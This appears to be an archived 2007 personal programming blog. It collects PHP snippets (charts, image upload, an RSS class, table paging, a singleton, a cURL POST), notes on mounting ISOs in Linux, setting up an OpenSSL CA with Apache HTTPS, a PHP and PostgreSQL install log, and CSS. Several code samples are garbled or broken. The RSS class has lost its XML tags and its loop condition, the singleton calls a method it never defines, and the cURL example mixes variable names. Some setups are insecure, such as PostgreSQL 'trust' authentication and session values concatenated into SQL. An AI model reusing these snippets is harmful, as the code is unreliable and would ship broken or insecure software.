mysql_select_db("jpg",$connect);
$query=mysql_query("select * from test",$connect);
$i=0;
while ($array=mysql_fetch_array($query)) {
$l2datay[$i]=$array["number"];
$i++;
}
mysql_close($connect);

// Create the graph.
$graph = new Graph(400,200,"auto");
$graph->SetScale("textlin");

$graph->img->SetMargin(40,130,20,40);
$graph->SetShadow();

// Create the bar plot
$bplot = new BarPlot($l2datay);
$bplot->SetFillColor("orange");
$bplot->SetLegend("Result");

// Add the plots to t'he graph

$graph->Add($bplot);

$graph->title->Set("Adding a line plot to a bar graph v1");
$graph->xaxis->title->Set("X-title");
$graph->yaxis->title->Set("Y-title");

$graph->title->SetFont(FF_FONT1,FS_BOLD);
$graph->yaxis->title->SetFont(FF_FONT1,FS_BOLD);
$graph->xaxis->title->SetFont(FF_FONT1,FS_BOLD);

//$graph->xaxis->SetTickLabels($datax);
//$graph->xaxis->SetTextTickInterval(2);

// Display the graph
$graph->Stroke();
?>

mount ISO in Linux

2007-11-16T22:09:00.000+11:00

在＃提示符下执行命令
cp /dev/cdrom XXXXX.iso
XXXXX.iso即为需要命名的ISO文件名
执行之后，光盘上所有文件就被映射成XXXXX.iso
至于如何加载请看下面，
还是在＃提示符下执行命令
rm -rf /dev/cdrom
ln -s /dev/loop7 /dev/cdrom
losetup /dev/loop7 /PATH（iso文件路径）
mount /mnt/cdrom
如果需要换盘
losetup -d /dev/loop7
再重复
losetup /dev/loop7 /PATH（iso文件路径）
mount /mnt/cdrom
如果是普通含有iso的光盘
可以直接使用命令
mount -t iso9660 -o loop /../*.iso /path
/.../*.iso 是iso文件路径
/path 是挂载点

Upload Image

2007-10-23T23:32:00.000+10:00


<?
if(isset($_POST['submit'])) { //see if submit button is pressed.

//check if they decided to upload a pic:
if($_FILES['userfile']['size'] > 1) { 

$max_size = 100000;
$max_height = 300;
$max_width = 300;

$info = getimagesize($_FILES['userfile']['tmp_name']);

//check file-size (in bytes): 
if(($_FILES['userfile']['size'] > $_POST['MAX_FILE_SIZE']) || 
($_FILES['userfile']['size'] > $max_size)) {
    die("<BR><BR>Error: Upload file size too large: (<b>" .
 $_FILES['userfile']['size'] . "</b>). Must not exceed XX kb.");
}

//check the extension.
     $array = explode(".", $_FILES['userfile']['name']); 
     $nr    = count($array); 
     $ext  = $array[$nr-1];
     if(($ext !="jpg") && ($ext !="jpeg") && ($ext !="png")) 
     die("<BR><BR>Error: file extension un-recognized. 
         Be sure your image follows the correct extension (.JPG or .PNG)");

//CHECK TYPE: (what the browser sent)
if(($_FILES['userfile']['type'] != "image/jpeg") && ($_FILES['userfile']['type'] != 
"image/pjpeg") && ($_FILES['userfile']['type'] != "image/png")) {
 die("<BR><BR>Error: Upload file type un-recognized. Only .JPG or .PNG 
     images allowed.");
}
 
//DOUBLE CHECK TYPE: if image MIME type from GD getimagesize() 
//-In case it was a FAKE!       
if(($info['mime'] != "image/jpeg") && ($info['mime'] != "image/pjpeg") && 
($info['mime'] != "image/png")) {
 die("<BR><BR>Error: Upload file type un-recognized. Only .JPG or .PNG
      images allowed.");
}

//check file size (length & width)
if(($info[0] > $max_width) || ($info[1] >$max_height)) {
    die("<BR><BR>Error: Image size error (<b>" . $info[0] . 
        "</b> x <b>" . $info[1] . "</b>). Must not exceed ". $max_height . 
        " x ". $max_width .".");
}

//rename file, move it to location.
if(is_uploaded_file($_FILES['userfile']['tmp_name'])) {

//get max number of images the user has uploaded 
$m = mysql_query("SELECT max(user_images) as `total_images` 
             FROM `images` WHERE `user_id` = '".$_SESSION['user_id']."'");
     if(!$m) die('An Error Occurred.');
       $result = mysql_fetch_object($m);
          if($result->total_images <= 0) {
                $image_number = 1;
          } else {
         $image_number = $result->total_images + 1;
          } //end if

$filename = strtolower($_SESSION['username']) . $image_number;

  if(move_uploaded_file($_FILES['userfile']['tmp_name'] ,
     $_SERVER['DOCUMENT_ROOT']."/path/to/image/".$filename . '.' . $ext)) {
    echo("File uploaded successfully.");  
   } else {
        echo("An error occurred while uploading.");
   }//end upload
} //end is_uploaded_file

} else { //display form ?>

<form enctype="multipart/form-data" action="<? $_SERVER['PHP_SELF']; ?>" 
method="post" name="uploadImage" />
<input type="hidden" MAX_UPLOAD_SIZE = "10000" />
<input type="file" name="userfile" size="35" />
<input type="submit" name="submit" value="Upload Image">

<? } //end else ?>

php Script to fetch RSS info

2007-09-18T22:00:00.000+10:00

/**
* Class name: RSS
* Author : LeadStar Team
* website : http://www.leadstar.com.cn/
* CopyRight : LeadStar Team
*/
if (defined('_CLASS_RSS_PHP')) return;
define('_CLASS_RSS_PHP',1);

class RSS {
//public
var $rss_ver = "2.0";
var $channel_title = '';
var $channel_link = '';
var $channel_description = '';
var $language = 'zh_CN';
var $copyright = '';
var $webMaster = '';
var $pubDate = '';
var $lastBuildDate = '';
var $generator = 'RedFox RSS Generator';

var $content = '';
var $items = array();

/**************************************************************************/
// function name: RSS
// function description: construct
// parameter: $title
// $link
// $description
/**************************************************************************/
function RSS($title, $link, $description) {
$this->channel_title = $title;
$this->channel_link = $link;
$this->channel_description = $description;
$this->pubDate = Date('Y-m-d H:i:s',time());
$this->lastBuildDate = Date('Y-m-d H:i:s',time());
}
/**************************************************************************/
// function name: AddItem
// function description: add a new node
// parameter: $title
// $link
// $description $pubDate
/**************************************************************************/
function AddItem($title, $link, $description ,$pubDate) {
$this->items[] = array('title' => $title ,
'link' => $link,
'description' => $description,
'pubDate' => $pubDate);
}
/**************************************************************************/
// function name: BuildRSS
// function description: generate rss xml file content
/**************************************************************************/
function BuildRSS() {
$s = "
\n\n";
// start channel
$s .= "\n";
$s .= "channel_title}]]>\n";
$s .= "<1ink>channel_link}]]>\n";
$s .= "channel_description}]]>\n";
$s .= "{$this->language}\n";
if (!empty($this->copyright)) {
$s .= "copyright}]]>\n";
}
if (!empty($this->webMaster)) {
$s .= "webMaster}]]>\n";
}
if (!empty($this->pubDate)) {
$s .= "{$this->pubDate}\n";
}

if (!empty($this->lastBuildDate)) {
$s .= "{$this->lastBuildDate}\n";
}

if (!empty($this->generator)) {
$s .= "{$this->generator}\n";
}

// start items
for ($i=0;$iitems);$i++) {
$s .= "\n";
$s .= "items[$i]['title']}]]>\n";
$s .= "<1ink>items[$i]['link']}]]>\n";
$s .= "items[$i]['description']}]]>\n";
$s .= "{$this->items[$i]['pubDate']}\n";
$s .= "\n";
}

// close channel
$s .= "\n";
$this->content = $s;
}
/**************************************************************************/
// function name: Show
// function description: print out the RSS xml file content
/**************************************************************************/
function Show() {
if (empty($this->content)) $this->BuildRSS();
echo($this->content);
}
/**************************************************************************/
// function name: SaveToFile
// function description: save the RSS content to a file
// parameter: $fname the file name to be saved
/**************************************************************************/
function SaveToFile($fname) {
$handle = fopen($fname, 'wb');
if ($handle === false) return false;
fwrite($handle, $this->content);
fclose($handle);
}
}

Ajaxian.com 2006 Survey Results

2007-09-08T12:06:00.000+10:00

Ajaxian.com 2006 Survey Results

The results of our second annual Ajaxian.com survey, prepared by Richard Monson-Hafael from the Burton Group, are in. And the winner is… Prototype, the most popular Ajax framework, by a considerable margin: 43% of you use it. Script.aculo.us is next, at 33%, confirming observations that many of made of the popularity of that duo.

The full results of our framework survey follow:

Note that multiple responses per participant were allowed; we’ve also thrown out any result with less than 3% of responses in the above graphic.

We also asked you about the server-side platform you’re using. The big winner here was PHP, with 50% of you using it:

Some other interesting factoids:

25% of you eschew frameworks and work with XMLHttpRequest directly (wow!)
11% of you are using JSON to transfer data; unfortunately, we didn’t ask enough questions to determine how this compares with XML or other data formats
3% of you are still using Microsoft’s “classic” ASP framework; five of you (~0.6%) are using C++ (+2 points for increased performance, -100 for increased complexity?)
2% of you wrote in to say that you’re using Adobe’s Flex toolkit (hey, those banner ads are working out…); 2% also indicated that they use the Flex/Ajax bridge. Unfortunately, the survey software we used doesn’t let us correlate these entries, so we can only say that 2%-4% of you are using Flex in some way
One participant uses Delphi (how’s that working out for you?), and another is using LISP (can we hire you?).

getElementsByClassName My Eesy Edition

2007-08-28T20:02:00.000+10:00

Take it easy

function getElementsByClassName(className, tag){
var testClass = new RegExp("(^|\\s)" + className + "(\\s|$)");
var tag = tag || "*";

var elements = (tag == "*" && document.all)? document.all : document.getElementsByTagName(tag);
var returnElements = [];
var current;
var length = elements.length;
for(var i=0; i
current = elements[i];
if(testClass.test(current.className)){
returnElements.push(current);
}
}
return returnElements;
}

getElementsByClassName Delux Edition

2007-08-28T19:55:00.000+10:00

GET it FROM http://muffinresearch.co.uk/archives/2006/04/29/getelementsbyclassname-deluxe-edition/

function getElementsByClassName(strClass, strTag, objContElm) {
 strTag = strTag || "*";
 objContElm = objContElm || document;
 var objColl = objContElm.getElementsByTagName(strTag);
 if (!objColl.length &&  strTag == "*" &&  objContElm.all) objColl = objContElm.all;
 var arr = new Array();
 var delim = strClass.indexOf('|') != -1  ? '|' : ' ';
 var arrClass = strClass.split(delim);
 for (var i = 0, j = objColl.length; i < j; i++) {
   var arrObjClass = objColl[i].className.split(' ');
   if (delim == ' ' && arrClass.length > arrObjClass.length) continue;
   var c = 0;
   comparisonLoop:
   for (var k = 0, l = arrObjClass.length; k < l; k++) {
     for (var m = 0, n = arrClass.length; m < n; m++) {
       if (arrClass[m] == arrObjClass[k]) c++;
       if (( delim == '|' && c == 1) || (delim == ' ' && c == arrClass.length)) {
         arr.push(objColl[i]);
         break comparisonLoop;
       }
     }
   }
 }
 return arr;
}

Javascript for updating one windows from another

2007-05-22T19:20:00.001+10:00

PHP DataTable Displaying and Paging

2007-05-12T12:08:00.000+10:00

I have made a function to fetch data from database and show it in a HTML table. It's easy to use but hard to read. HTML text has been linked together.


function getResultAsTable ($actions, $result)
{
     if ($rowcount =pg_num_rows($result)>0)
     {
         $resultHTML= "<table border="'1'" align="'center'">\n<tr bgcolor="'#e8eefa'">\n";
        
         //Output the table header
         $fieldCount = pg_num_fields($result);
         for ($i=0; $i < $fieldCount; $i++)
         {
             $rowName = pg_field_name($result,$i);
             $resultHTML .= "<th valign="'middle'">$rowName</th>\n";
         }
        
        $resultHTML .= "<th>Actions</th></tr>\n";
    
        //output the table body
           while ($row = pg_fetch_row($result))
        {
             $resultHTML .="\n";
             for ($i=0; $i < $fieldCount; $i++)
             {
                $resultHTML .="<td>".htmlentities($row[$i])."</td>\n";
             }
            
               //Replace VALUE with proper primary key
             $action = str_replace("VALUE", $row[0], $actions);
             //Add action cell to the end of each row
             $resultHTML .= "<td>$action</td>\n</tr>\n";
            
         }
        
         //Close table
         $resultHTML .="</table>\n";
     }
     else
     {
         $resultHTML = "No Result Found";
     }
     return  $resultHTML;
}


function pageLinks($totalpages, $currentpage, $pagesize, $parameter)
{
// Start at page one
$page = 1;
// Start at record 0
$recordstart = 0;

// Initialize page links
$pageLinks = '';
while ($page <= $totalpages) {     
// Link the page if it isn't the current one     
 if ($page != $currentpage) {
   $pageLinks .= "<a href="http://www.blogger.com/%5C" 
  parameter="$recordstart\">$page</a> ";
      // If the current page, just list the number
  }
  else {
      $pageLinks .= "$page ";
  }
  // Move to the next record delimiter
  $recordstart += $pagesize;
  $page++;
}

return $pageLinks;
}

Design Pattern in PHP Architecture

2007-05-12T12:06:00.000+10:00

Singleton pattern defines a class that hs only a single global instance. There are an abundance of places where a singleton is a natural choice. A browsing user has only a single set of cookies and has only one profile. Similarly, a class that wraps an HTTP request has only one instance per request. If you use a database driver that does not share connections, you might want to use a singleton to ensure that only a single connection is every open to a given database at a given time.

One successful method for implementing singletons in PHP5 is to use a factory method to create a singleton. The factory method keeps a private reference to the original instance of the class and returns that on request.

class Singleton {
private static $instance = false;
public $property;

private function __construct () {}
public static function genInstance ()
{
if (self :: $instance === false) {
self :: $instance=new Singleton;
}
return self :: $instance;
}
}

$a = Singleton :: getInstance()
$b = Singleton :: getInstance()
$a ->property = "Hello world";

print $b ->property;

//Amazing! The result will be "Hello world"//

In fact, if set the constructor methods private, you can only make instance inside the class, if you try to instantiate outside the class, you will get a fatal error.

PHP and CURL (make post between two sites more secure)

2007-05-03T18:14:00.000+10:00

We can also use CURL to post data to a form. The default method of sending form data with CURL is in GET, but in this example we will use POST to submit a search term to an imaginary form.

[php] // Setup a string with the form parameters in it
$strParameters = "query=dog";

// Initialize the CURL library
$cURL = curl_init($cURL);

// Set the URL to execute
curl_setopt($cCURL, CURLOPT_URL, "http://www.mywebserver.com/mysearch.php");

// Set options
curl_setopt($cCURL, CURLOPT_HEADER, 1);
curl_setopt($cCURL, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cCURL, CURLOPT_POST, 1);
curl_setopt($cCURL, CURLOPT_POSTFIELDS, $strParameters);

// Execute, saving results in a variable
$strPage = curl_exec();

// Close CURL resource
curl_close($cURL);

// This will print out the HTML contents
echo($strPage);

?>[/php]

Make a CA for My Own

2007-04-17T08:12:00.000+10:00

It's lucky to have a sever on my own computer. So I get chance to know more about how to protect web server. It is not enough make strict privilege access to certain folders and files. One good way to protect communication between server and client is to assign a CA to client at the beginning of communication, and in this way, a unique encryption system can be set up every time client connect to server.

Normally, certification issuers, which are called Certificate Authority, are big security companies. Their CA sometimes play a more important role than a business certification, because this CA can not be modified or counterfeited. But in a cyber world, everybody can be an Authority, everybody can issue his own certification. Although this kind of CA cannot enjoy high prestige as commercial one. But it can still be very useful for encryption messages sent between server and client.

Here is a simple way to set up a HTTPS server on Ubuntu:

1. install Openssl and get root CA
sudo apt-get install openssl
/* setup a root CA, and make sure the password is complex enough */
openssl genrsa -des3 2048 > rootca.privatekey

Work out a self-certificate based on the root CA，change the valid time if needed.

openssl req -new -x509 -key rootca.privatekey -days 3650 -out rootca.cert

In the process，you will be asked to provide your information, including organization name and physical location and so on.
Open /etc/ssl/openssl.cnf modify the environment variable like this:

dir = /etc/ssl/CA
Set up several folders to reserve the private files:
sudo mkdir -p /etc/ssl/CA/certs
sudo mkdir -p /etc/ssl/CA/newcerts
sudo touch /etc/ssl/CA/index.txt
sudo echo “01″ > /etc/ssl/CA/serial

copy the root CA to this folder

sudo cp rootca.privatekey /etc/ssl/CA/private/cakey.pem
sudo cp rootca.cer /etc/ssl/CA/cacert.pem

change privilege to deny all access but from root:

cd /etc/ssl
sudo chmod go-rwx CA -R

2. Set Up Certification for Apache SSL

Generate a user CA first, an the process is similar to set up a root CA:

openssl genrsa -des3 2048 > my.privatekey

Generate a key file based on the user CA:

openssl req -days 3650 -key my.privatekey -new -out my.csr

Private information needed，Orgnization Name and location must be the same with root CA. Common Name is your web site's FQDN(fully qualified domain name. For example www.gezhi.org，and note that www.gezhi.org and gezhi.org are different sites )
then use root CA to authorize the user certification we made for apache:

openssl ca -out my.pem -days 3650 -infiles my.csr

3. Config apache

Ubuntu apache2 intalled mod_ssl on default，so just enable the modulate: a2enmod ssl

/* combine my.privatekey and my.pem, copy it to /etc/apache2/ssl/apache.pem */

cat my.privatekey my.pem > apache.pem
sudo cp apache.pem /etc/apache2/ssl/apache.pem

Set up the virtual host in /etc/apache2/sites-enabled/youdomain.conf (or in /etc/apache2/apache2.conf), it must include following lines:

ServerName mydomain.com
ServerAdmin webmaster@localhost
SSLEngine On
SSLCertificateFile /etc/apache2/ssl/apache.pem
DocumentRoot /directory/to/mydomain/dir/

…

Add https listen port in /etc/ports.conf

Listen 443

restart the apache server:

sudo /etc/init.d/apache2 restart

when apache2 starts, it will ask for password for my.privatekey

My Domain

2007-03-27T09:53:00.000+10:00

My new domain: www.cbdmall.com
Right now, I direct it to my home ip, since I still cannot find a satisfactory host for my project. Maybe I should foward it to my VMWare if possible, that will make things much easier.

Bar Chart in PHP

2007-03-26T00:07:00.001+10:00

I have learned a good example to display a bar chart in PHP, and I added a loop
statement, so the length of the bar can fit for the width of the browser.
Since the blog will filt a lot of html and PHP tags, I will pulish the final result in my online host. The main idea is to set the a table's cellpadding>=2, and then set bgcolor's length flexible to the cell in which a bar is displayed. In other word, the bgcolor length is directly propotional to the amount we defined.

Interesting css error with firefox

2007-03-26T00:07:00.000+10:00

when make the body tag "float", everything mass up...... That's true
body cl*ss="interesting"

in css file:

interesting {
float: left;
}

guess what, the whole page's layout will be changed, especially padding and margin....
I have discussed this with Tim, but still don't know exactly the reason.

I guess this is a kind of bug in firefox when it tries to compile FLOAT tag

PHP+PostgreSQL set up

2007-03-25T18:10:00.002+10:00

I spend a whole weekend to work on LAPP. Just a little different from the popular term of "LAMP"(Linux+Apache+MySQL+PHP), 'cause mine is Linux+Apache+PHP+PostgreSQL :p

Here is the my install log for the whole staff (I set up a server in VMware, so I can check my results and fix bugs before submitting to a public server).

1. Download Ubuntu
2. Create a new ubuntu operation system in VMware, boot from Ubuntu6 iso file
3. After the system is done, use apt-get command or package management to install Apache2, PHP5, PostgreSQL8. The following additional modulates should be included:

OpenSSL: a SSL server enable me to login to the system from remote
install modulates: php5-mhash, php5-gd, php5-curl, php5-mhash, php5-pgsql, php5-xslt.

4. Configure PostgreSQL setting:

$useradd postgres
$chown -R postgres:postgres /etc/postgresql
$ sudo nano /etc/postgresql/8.1/main/pg_hba #add 127.0.0.1 to trust#
$ sudo -u postgres createuser -P #create the account and input name, passwd.... #
$ sudo -u postgres createdb test #create a db named test #
$ psql -U [username] test #log into test db if everything goes right#

5.Networking config

6 files are involved:

· /etc/hosts （signed computer name to IP address）
· /etc/networks （associate domain with IP address）
· /etc/sysconfig/network （open or close network, config computer name and gateway)
· /etc/resolv.conf （add DNS server IP)
· /etc/rc.d/rc3.d/S10network （as a wizard to activate the ethnet）
· /etc/sysconfig/network-scripts

Configure IP, directly edit /etc/network/interfaces，static IP can be edited as following：auto lo eth0iface lo inet loopbackiface eth0 inet staticaddress 192.168.2.2 netmask 255.255.255.0 broadcast 192.168.2.255 gateway 192.168.2.1

If assigned by DHCP, edit as: auto eth0iface eth0 inet

Command line is a better way:

ifconfig -a # display the network confi# ifconfig eth0 inet down #stop network # eth0ifconfig eth0 inet up 192.168.1.2 \netmask 255.255.255.0 broadcast 192.168.1.255 #config IP address netmask # add default gw 192.168.1.1 eth0 #gateway config#

When done, restart the networking: /etc/init.d/networking restart

6. Test web server

Change to the directory /var/www/ create a file, named info.php, add to it. Type the URL : 127.0.0.1/info.php in a browser, php config info will be displayed.

Create a file named pg_connect.php, add text:

//connect pgsql test//

$linkid = @pg_pconnect("host=localhost dbname=test user=postgre password=secret")

or die("Could not connect to the PostgreSQL server.");

$result= @pg_query("SELECT* FROM mytable") or die("The query failed");

//out put the result//

while($row=pg_fetch_object($result)) echo "No.$row->id is ($row->name)
";

?> # this will check PHP+PostgreSQL successuful or not #

7. Configure virtual host for different domain

/etc/apache2/sites-available/default is the default rule for domain root.
Add my own default domain config:
DomainName www.mydomain.com
DomainAdmin webmaster@mydomain.com
DomainRoot /anywhere I want/

If want to run more than one domain, I have do create a new file in the fold:
nano ./sites-available/newdomain
in the file, add another rules:

ServerName www.newdomain.com
ServerAdmin webmaster@newdomail.com
DocumentRoot "/another location you want/"
ErrorLog "/var/log/apache2/***_errors.log"
CustomLog "/var/log/apache2/***_accesses.log" common

When separate every domain config rule into a single file, we can just control the host very easily:
sudo a2ensite [rule.filename] to enable a domain
sudo a2 dissite [rule.filename] to disable a domain
don't forget to restart apache for new rules: sudo /etc/init.d/apache2 restart

Power of CSS 2

2007-03-21T11:16:00.000+11:00

#nav {
float: left;
width: 100%;
margin: 0;
padding: 10px 0 0 46px;
list-style: none;
background: #FFCB2D;
}
#nav li {
float: left;
margin: 0;
padding: 0;
font-family: "Lucida Grande", sans-serif;
font-size: 55%;
}
#nav a {
float: left;
display: block;
margin: 0 1px 0 0;
padding: 4px 8px;
color: #333;
text-decoration: none;
border: 1px solid #9B8748;
border-bottom: none;
}

This is a good example of combining usage of background and padding in "Bulletproof
Design". The author's method have avoided using big pictures, which will enhance the
page's scalability and flexibility.

Draft of Study Proposal

2007-03-20T17:53:00.000+11:00

http://students.mim.iml.uts.edu.au/users/10530982/test.html

I also use the page as CSS practice field. So the style effect may change sometimes.

Power of CSS(1)

2007-03-19T23:58:00.000+11:00

I used to create some simple web page by Macromedia's Dreamweaver. This powerful tool generates various CSS code with several simple clicks, so I never try to learn style design myself. But when I got this blog, I was desperate by the templates provided--the color, the frame width, the picture size definitions. Time to change this, also time to learn... Several days later, it looks like what you have seen now. I have adjusted every detail I didn't like... Also, some advanced skills can be learned in book "Bulletproof Web Design: Improving flexibility and protecting against worst-case scenarios with XHTML and CSS". It contains 10 cases about CSS application. I benefit a lot from the first three cases. Although I have not read though the book, but I wanna created a page using the methods it mentioned.

Combining use of Div Tags, Float, Padding and Margin, sometimes, would be an alternative to complex tables and forms that traditional web page design involved. But tables are still important elements in web pages, and some CSS on table would be useless if we overlook some pre-defined rules. Still, some seldom used tags in table do have their special features:
http://www.w3.org/TR/html401/struct/tables.html

Draft of Draft for DMT Learning Proposal

2007-03-11T22:16:00.000+11:00

I have spend a whole day to check my documents and figure out what I should learn in DMT course. I have great interest in e-commerce, which need DMT things a lot.

In fact, I should learn a lot about DMT, not just for the course, but just for my future. XHTML, PHP, SQL, Java Script, XML,... too many programming things I should learn. I used to like to learn from delicately planned lectures. In Tim's class, I smelt sth. different: I have to plan for myself.

I have read some books about HTML and CSS, but can hardly remember the tags' meaning. I have learned sth about PHP, but it is superficial, and I even didn't try to set a dynamic website for my own. I know sth about SQL, XML... but never use them in any on-hand practice. Finally, I got a picture of myself: what I need is to do some work really through my hands. And I aim to get familiar the whole development process from the very beginning.

It's said that PostgreSQL has all the all the modern db features. So I wanna have a try on it. Then I choose Apache+PHP+PostgreSQL on Linux as my publishing platform. I have collected some highly reccommended books/ebooks:

Html,.Xhtml.And.Css.Bible

Apress - Beginning PHP and PostgreSQL 8 From Novice to Professional

Apress - Pro PHP XML and Web Services

OReilly.PHP.Hacks.Tips.and.Tools.For.Creating.Dynamic.Websites

Going through these books won't be my aim. I just will do sth myself with these books. Regarding to my interest in e-commerce, I'd like to design a e-commerce web site realizing catalog and transation data retrieved from database.

JSP included by PHP

2007-03-08T01:12:00.000+11:00

First, PHP manual should be downloaded from: http://de.php.net/download-docs.php

This official handbook is for all the people who want to learn php, from beginner to experienced PHP programmer. It covers everything!!

Here comes what I want to show you:

Funtionally, PHP is much like JSP. And JS can be included in a PHP file very easily. If you wanna create sth shining and simple, to add some little JS into you php page is a very good choice.

For example, I can simplily create a navigation menu by PHP maybe like this:
http://karlcore.com/programming/dynav/menu.phps
this is a good example to use an array to list everything we want to see. But don't you think it is too stiff or mechanical?

Here is a good way to create a drop-down menu with Java Script:
http://www.thesitewizard.com/archive/navigation.shtml
Let the navigation menu stay in good structure and make it a little bit cool! This simple Java Script can manage that.

Here is one more step before you can see your improved menu (in fact, it is also mentioned in the article), you need your PHP file to get into the Java Script and use it! Just simply use a 'include' function in PHP. JS will be parsed rightly into your php environment. Enjoy!

First page

2007-02-28T09:33:00.000+11:00

Leave my foot print here!